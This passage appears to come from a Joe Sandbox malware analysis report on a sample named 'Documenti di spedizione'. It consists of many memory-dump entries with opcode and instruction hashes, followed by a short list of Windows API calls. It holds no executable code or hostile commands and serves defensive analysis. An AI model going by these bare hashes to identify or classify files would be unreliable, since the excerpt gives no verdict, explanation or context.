                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d4a6e5ef21c158e3496ce1b0319da836a297a1aecc405018dbfaaeb815154d7
                                            • Instruction ID: e3d34f290b847ff467dcc13d7b95a68107bf4cc156c8b18e5c0f7d1e46123de7
                                            • Opcode Fuzzy Hash: 5d4a6e5ef21c158e3496ce1b0319da836a297a1aecc405018dbfaaeb815154d7
                                            • Instruction Fuzzy Hash: 9A2192306042406BDF60DB28E984BA937AAEF56308F104937D109DB675DE38DD47CBA2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62fc3f41b7390000ceeb105580d917838f08e5009d57f88ecb3e3508f72713c0
                                            • Instruction ID: 1a740170ef15b7034ddd3c153302251f04160adb24a4ea4bced4a4db1e82e16e
                                            • Opcode Fuzzy Hash: 62fc3f41b7390000ceeb105580d917838f08e5009d57f88ecb3e3508f72713c0
                                            • Instruction Fuzzy Hash: 05213E71A013119BDF659BB895403EE77E5EF45310F24087BE809E7342DA39C882C7A1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0dbab4152ec8c4218159ae44acdc9364a9d0dbcc15094956f5971ecb8a3b006
                                            • Instruction ID: 96aead97db876a5bb68c0eed8abaebe8264f5e8e60bc141439dd4c18ee0b9678
                                            • Opcode Fuzzy Hash: b0dbab4152ec8c4218159ae44acdc9364a9d0dbcc15094956f5971ecb8a3b006
                                            • Instruction Fuzzy Hash: 01215135E0020A9BDB59CFA5D85069EF7B2EF86300F14862AE915BB340DB749C86CB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f2dbbf603955fca2ce90c934b83dfb37b2e7ac5122f9ea8e904f0b84783013e
                                            • Instruction ID: a9e79fde96c7c9d1ff6bc1664b4b20ca9365d140208b2f520dddd54ad1ad9ef5
                                            • Opcode Fuzzy Hash: 6f2dbbf603955fca2ce90c934b83dfb37b2e7ac5122f9ea8e904f0b84783013e
                                            • Instruction Fuzzy Hash: F0214C75F00215AFEB41CF79D880A9EBBF5EB88714F108125E909E7350E735D942CB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 229a261590246e70b67ea7e5b54dafaefe484a4e44b5bbe734fdb846ec2aa1b7
                                            • Instruction ID: 0d70834490d10e20d80c352841a94c3e8f86aff774400fafcb1b4291ca356c19
                                            • Opcode Fuzzy Hash: 229a261590246e70b67ea7e5b54dafaefe484a4e44b5bbe734fdb846ec2aa1b7
                                            • Instruction Fuzzy Hash: E3216075F00315AFEB41CFB9D880A9EBBF1AB88714F108125E909E7390E735D942CB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2b194f202ac044c468b5c15a2afa96e7c7e9c2416616f2e50f39609974c5928
                                            • Instruction ID: 0ebd7d00e6e591e3e10938bee85985780bbc9cbcb5c8a4a8edb3cd7949a8791c
                                            • Opcode Fuzzy Hash: e2b194f202ac044c468b5c15a2afa96e7c7e9c2416616f2e50f39609974c5928
                                            • Instruction Fuzzy Hash: 43217431E003059BDB14CFA5D4506DEBBB2AF86350F10862BE855FB350DB75AC46CB52
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94b726fecf0ccb0c763cfe40777bbe3d2145b3c21e73103269822d4637cadbda
                                            • Instruction ID: 7e3869b1a01fe0f43c589dfc432ed1cd26cd0fffb33b587a694b754b7ace5980
                                            • Opcode Fuzzy Hash: 94b726fecf0ccb0c763cfe40777bbe3d2145b3c21e73103269822d4637cadbda
                                            • Instruction Fuzzy Hash: 32212C30610205CFDB54EB78C958BAE7BF1EF48345F1044A9E506EB360DB3A9D01CBA1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ddc6b337e519a95db12655f9a396a13ceb19e91d48cc7906e2a1dc93ff60f1ef
                                            • Instruction ID: 42b0d7ba0414ba9e6d428141259e91fff3b22ff67b8b4d6cccb5963914ff52f0
                                            • Opcode Fuzzy Hash: ddc6b337e519a95db12655f9a396a13ceb19e91d48cc7906e2a1dc93ff60f1ef
                                            • Instruction Fuzzy Hash: 4811AC313047809FC75AAB3858A417E6BE3AFC621471849BEE54ACB3D2DE348D0B9391
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246230285.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_ad000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 882a16d00076381560995e26cbd9c5049af135524833c6673547929b698fed9f
                                            • Instruction ID: a9ce80483b613ec9dfd00db0927668982e7d4e96a20915ea43853aeb9f0ac30f
                                            • Opcode Fuzzy Hash: 882a16d00076381560995e26cbd9c5049af135524833c6673547929b698fed9f
                                            • Instruction Fuzzy Hash: E921F271604204DFCB24DFA4D980F26BBA5FB89314F24C56AD94A4B656C33AD846CA62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab1f2c744f480ba4be0f95683fd22ef78849bf4914c60b46047f7b7842a80fda
                                            • Instruction ID: 7fc1a6ef6b133e52f2b9cb083ad7bb15df63e3bf803a52c0e5cd9712e6532ec1
                                            • Opcode Fuzzy Hash: ab1f2c744f480ba4be0f95683fd22ef78849bf4914c60b46047f7b7842a80fda
                                            • Instruction Fuzzy Hash: 77215031F003059BDB18CFA5D45069EBBB2AF8A350F10862BE815BB350DB75AC46CB62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7aa3b2a99ad0682322cccca79cb172052017f624f27c52fd2425ffbfb21a3a57
                                            • Instruction ID: 722027e66c593a970971ae86712133b17e3b5a9f5aae17ec9b4a92fa9773e969
                                            • Opcode Fuzzy Hash: 7aa3b2a99ad0682322cccca79cb172052017f624f27c52fd2425ffbfb21a3a57
                                            • Instruction Fuzzy Hash: DE213C30B00305AFDB54EB68C6256EE77F6AF89345F10046AD106EB3A4DF798D41DBA1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3a6b9439c87f33dc638b48f92fc5f6c0d27ec97379fca18ae89bd0016db9e88
                                            • Instruction ID: fd5f8b18ae1d9d2d97487f51aed1cb9e76cb583894a475ec6b071ff8c49d557d
                                            • Opcode Fuzzy Hash: f3a6b9439c87f33dc638b48f92fc5f6c0d27ec97379fca18ae89bd0016db9e88
                                            • Instruction Fuzzy Hash: 39215E306002416FDF65DB28F984B9937AAEF45308F104926D10ADB675DE38DD8BCBA1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae5f5b9bea257ee74f4416d2af34662d74c693e360380f83ffad64063f86f57e
                                            • Instruction ID: d0a719bf67a150406270c13db492ba3058d993de5b2daa9c5243df62ad26787b
                                            • Opcode Fuzzy Hash: ae5f5b9bea257ee74f4416d2af34662d74c693e360380f83ffad64063f86f57e
                                            • Instruction Fuzzy Hash: E6211630610204CFDB54EB78C958BAE7BF1EF88345F104469E506EB3A0DB7A9D01CBA0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0ae65e0ffbdf4a784c07665ff2ca2edbdbd2969a3d2ca4af0ca3a09e9540aff
                                            • Instruction ID: 23f9c01502bf0d8180bc8094fa5524a44f27e2b6805cf0576e19faf441be6d5c
                                            • Opcode Fuzzy Hash: e0ae65e0ffbdf4a784c07665ff2ca2edbdbd2969a3d2ca4af0ca3a09e9540aff
                                            • Instruction Fuzzy Hash: F4219A35B001049FEF44CB68E954A8EBBB7EF84354F248539E909EB341DB36DC468B80
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eec335e68c0da4ba627970c976e5a2a5922684e197110c9357ed7a3875addcbd
                                            • Instruction ID: d14fccb5edf0d987542cd18c489b5e562fc20bc6bafab77184be6e65ec8c2ae9
                                            • Opcode Fuzzy Hash: eec335e68c0da4ba627970c976e5a2a5922684e197110c9357ed7a3875addcbd
                                            • Instruction Fuzzy Hash: E411B230B003048BDFA49A79D45472D32D6EF81310F20493BE18ACB395DE64CC829BE1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fdfa90793b7f070c9da9642474eb5d210544d258335ac6765e22eaa89328d545
                                            • Instruction ID: e6daa0ddd307aabbeae20be23acd0897823907bf7d0dceee2a5cde2464441b2a
                                            • Opcode Fuzzy Hash: fdfa90793b7f070c9da9642474eb5d210544d258335ac6765e22eaa89328d545
                                            • Instruction Fuzzy Hash: 7E11E971F00351AFCF509B7998046AE7BF5EB49660F140827D949D7350EF34C9438796
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 323352b912ea6c502517e0cbc0c5043974af94574e74e4869f953204355bb1e1
                                            • Instruction ID: 08ef94cea38a5fb5e3984e3cbf3664fa83a8328520771aee6c1b80136bd06c72
                                            • Opcode Fuzzy Hash: 323352b912ea6c502517e0cbc0c5043974af94574e74e4869f953204355bb1e1
                                            • Instruction Fuzzy Hash: 2711A330B003448FEFA49AB5D85476E3695DB52310F10497BE58EDB392DD68CC45ABF1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4044b20975d05ec1a99230ec4a783226f50ce149aa7ad37109ad973cd6e76d08
                                            • Instruction ID: 39098b266afdfb34053a6cac2017439944aed941cd02cef121f7c92403f747cf
                                            • Opcode Fuzzy Hash: 4044b20975d05ec1a99230ec4a783226f50ce149aa7ad37109ad973cd6e76d08
                                            • Instruction Fuzzy Hash: CF11AD36B102299BEB559A7AC8146AE73EAEBC8651F00413AD50AF7340DF66DC03CB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6b0ed45bdfb9997078d14da05b7f57ec8295c1cce6f8a93c73dd652052cd38e
                                            • Instruction ID: af375998371749dd81d46777f3896c792e9a1e535a6f595b127531dfeebe79d9
                                            • Opcode Fuzzy Hash: a6b0ed45bdfb9997078d14da05b7f57ec8295c1cce6f8a93c73dd652052cd38e
                                            • Instruction Fuzzy Hash: EE0124357004404FEF568A7DA450B2E77D6DBCA750F14843EE40ECB341D916CC074B91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93aaf5f90877d4062a2d4bf3eca34002502986e123ca8b42cdc0673ab71b67d6
                                            • Instruction ID: ac8f1374153446066c32cdb01f13f63965af1ae0993fef764f1e5975981f36e6
                                            • Opcode Fuzzy Hash: 93aaf5f90877d4062a2d4bf3eca34002502986e123ca8b42cdc0673ab71b67d6
                                            • Instruction Fuzzy Hash: 6221C2B5D01259AFCB00CFAAD884ADEFFB4FF49310F10816AE918A7200C3796954CFA5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0378ff661a05bbffcda71cb7e0b970ea79d3eb9b7feb7574dd7f9f7df93a4b5c
                                            • Instruction ID: 4efd047e759cc1c0daddff2a48f75f93a3cd1a742c895d2f8c97cbb5f0102b5e
                                            • Opcode Fuzzy Hash: 0378ff661a05bbffcda71cb7e0b970ea79d3eb9b7feb7574dd7f9f7df93a4b5c
                                            • Instruction Fuzzy Hash: 4E016D71A013149FCF61EFB995512EE7BE5EF48310F24047AE809E7342EA35D8428BB1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c59670ad092784951199459504adc3a4dad2490dc806f6ace0f42a9ee668fa0
                                            • Instruction ID: 794e954fffd0c5873b4626d3d37faf42d2c6951bfa8773c1b42aa70cc08e3501
                                            • Opcode Fuzzy Hash: 5c59670ad092784951199459504adc3a4dad2490dc806f6ace0f42a9ee668fa0
                                            • Instruction Fuzzy Hash: E611A175E00219AADB64DB79C8505DEF7B5AFC9310F10867AE40AE7310DA31CA41CB90
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a88fe1a5aeb6aceea6f060b42d6137cbcbe5e696094f23880fe93b7987c7f475
                                            • Instruction ID: ab5983a0a370e88ba2be22242a0ce0906790e664d508982a61de463e5563ccbf
                                            • Opcode Fuzzy Hash: a88fe1a5aeb6aceea6f060b42d6137cbcbe5e696094f23880fe93b7987c7f475
                                            • Instruction Fuzzy Hash: 1F01AD3A7000105BFB549A6DD4147AFB3DADBC9714F21843AE10EC7355EA66DE4743D1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246230285.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_ad000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
                                            • Instruction ID: 32f565284dcd60c5411947837443950d1157860d12ad16c477a22463009a6f1e
                                            • Opcode Fuzzy Hash: d146c012d62b50799e69983f9b519668de3e8daf9b392618dad8028a3e4e9ddc
                                            • Instruction Fuzzy Hash: 3511DD75504280DFCB12CF54D5C4B15FFB2FB89314F28C6AAD84A4BA56C33AD84ACB62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0f6c60d4843c33b4b555de46914e624e02484e6e64261b3781e3cf8c0757763
                                            • Instruction ID: 9bf772cc841b310e4d1bebd40d1d8d3ce2e9576d58c25360e30507d77a596847
                                            • Opcode Fuzzy Hash: b0f6c60d4843c33b4b555de46914e624e02484e6e64261b3781e3cf8c0757763
                                            • Instruction Fuzzy Hash: FD11A4B5D01259AFCB00DF9AD984ADEFBB4FB49310F50812AE918A7200C3796554CBA5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e883e2d6b750ff4446d180677feac1680f5091b61021973b2469622ca3ad062
                                            • Instruction ID: 933067e86f67491441a630853a39fca96386b1467b0d9f2c8e309f8d6a5c6dfd
                                            • Opcode Fuzzy Hash: 4e883e2d6b750ff4446d180677feac1680f5091b61021973b2469622ca3ad062
                                            • Instruction Fuzzy Hash: C201DC3A7000105BFB549A6DD814B9FB2CACBC9714F21843AE10EC7355EA66DD4743C1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cb574fbeae2c14f2719c570aba739637028a1d31def84fe3ff1f99a452f57ad0
                                            • Instruction ID: 33c9479e683d00d2775308aec0c2623b058fbafe1cb903e4f509c9048ce65fc2
                                            • Opcode Fuzzy Hash: cb574fbeae2c14f2719c570aba739637028a1d31def84fe3ff1f99a452f57ad0
                                            • Instruction Fuzzy Hash: 3301D136F101296BEB868679CC147EF73ABABC8600F04023AD50AE3340DF61CC078791
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 840df69531c87d369e11ff2a5df1d87956c6c2163f7868b4a323d7aed79f016f
                                            • Instruction ID: 14bf1bc07c456dac5874b0809daef9cf34f7c5b0ee183e177350f47488e609c7
                                            • Opcode Fuzzy Hash: 840df69531c87d369e11ff2a5df1d87956c6c2163f7868b4a323d7aed79f016f
                                            • Instruction Fuzzy Hash: 4501AF357004109BEF659A6EE454B2FB7DADBC9765F14883AE50ECB340EE26DC034791
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c18f9bb597a0497bfa386560ed6cbde7a3f6961a5d33628678457e55047da7b0
                                            • Instruction ID: c36b62ea17778ddf04a57940a6fd5a37f56524badd13e1b865efafaf6bfb810d
                                            • Opcode Fuzzy Hash: c18f9bb597a0497bfa386560ed6cbde7a3f6961a5d33628678457e55047da7b0
                                            • Instruction Fuzzy Hash: 2A0181357000104FE755DE6CD568B5ABBE6EBC9B59F248439F50ED7390DA22DC038791
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28775b7d145ec05652d3c46df0defd56518b6c612ecff9f02567cdee05a8036a
                                            • Instruction ID: 2abf1e598359b172d37a1e721ca6c070a0e186a9da62be0ea70269ae5ab9f278
                                            • Opcode Fuzzy Hash: 28775b7d145ec05652d3c46df0defd56518b6c612ecff9f02567cdee05a8036a
                                            • Instruction Fuzzy Hash: AF0181357000104FE750DA6DD458B4AB7DAEB89B54F208439E50ED7390EA22DC038781
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9754f38779bd89c75b324b682510dfd5cb04c9fb627619f70b4356ecd4189748
                                            • Instruction ID: 2f52acc58d5fe4910ac2163d0e994bdf037cb5c24c221b14a975fc89990931c0
                                            • Opcode Fuzzy Hash: 9754f38779bd89c75b324b682510dfd5cb04c9fb627619f70b4356ecd4189748
                                            • Instruction Fuzzy Hash: FBF024347002264BCF216AB9E55167EA7CADFC1364F04893AD00BCB315DA28CC0B87A0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2021ccbb96850b85540c6c504b917fa89bf7c02c8d511c5cf899774938ab65e7
                                            • Instruction ID: ef01760c68a495bd3acd6b25dc47c2bc8d2e09949564450519459577afb6a8f3
                                            • Opcode Fuzzy Hash: 2021ccbb96850b85540c6c504b917fa89bf7c02c8d511c5cf899774938ab65e7
                                            • Instruction Fuzzy Hash: AFF0B4353002164BCB256ABAE55167AB6CADFC1364F04893AD00ACB355DA29DC0743A5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f09464e3a2992956e0fb9f72e8717877f723e065050fc6b69af3dcc397285dbb
                                            • Instruction ID: 6962e65c770afebb17abd5f21c176e3eeecd6269ba12c2fd0ef15bdab731072a
                                            • Opcode Fuzzy Hash: f09464e3a2992956e0fb9f72e8717877f723e065050fc6b69af3dcc397285dbb
                                            • Instruction Fuzzy Hash: 22F02736F102B49BEB149575D8009DEB736FB80350F004139ED01F7340D6326C02CB80
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cd2b90dd109be9a4d88d3bf560e833059d54477848f620885d50c1a8ead1268
                                            • Instruction ID: d2d6c2971218a1725fc3fe05bf83624d982431ec284f14f8501ce3402813e890
                                            • Opcode Fuzzy Hash: 2cd2b90dd109be9a4d88d3bf560e833059d54477848f620885d50c1a8ead1268
                                            • Instruction Fuzzy Hash: 95E0DF263005108BFB628E7EF0A078A7B92CBC6A65F208037E18ECF240DA13CC0B4751
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 339e4544b081a3fc802484cce7d01feb947b6ab749c19d482db4b680565cfc86
                                            • Instruction ID: 271e9c00c6562f6601e47ea876387f0df872897fbcd96ef76886d43a97fc3ac4
                                            • Opcode Fuzzy Hash: 339e4544b081a3fc802484cce7d01feb947b6ab749c19d482db4b680565cfc86
                                            • Instruction Fuzzy Hash: D5E08675E01108FFFB50CAB48949B8E77B99B41244F2185B9E409E7105D577C9438B00
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945c0cdf58406f5b09a5406506665f30f98b30afedea8f7277e00dedd96afc44
                                            • Instruction ID: f03338de6935cb79e6b925e110cbe3a01b16483175ba01d238180a96081009b1
                                            • Opcode Fuzzy Hash: 945c0cdf58406f5b09a5406506665f30f98b30afedea8f7277e00dedd96afc44
                                            • Instruction Fuzzy Hash: AED05E30209B909BC374EA59D144A56B7E9BB48754B94445AF44787B40CB60FC01C790
                                            APIs
                                            • SetErrorMode.KERNEL32 ref: 004032E4
                                            • GetVersion.KERNEL32 ref: 004032EA
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403313
                                            • #17.COMCTL32(00000007,00000009), ref: 00403335
                                            • OleInitialize.OLE32(00000000), ref: 0040333C
                                            • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 00403358
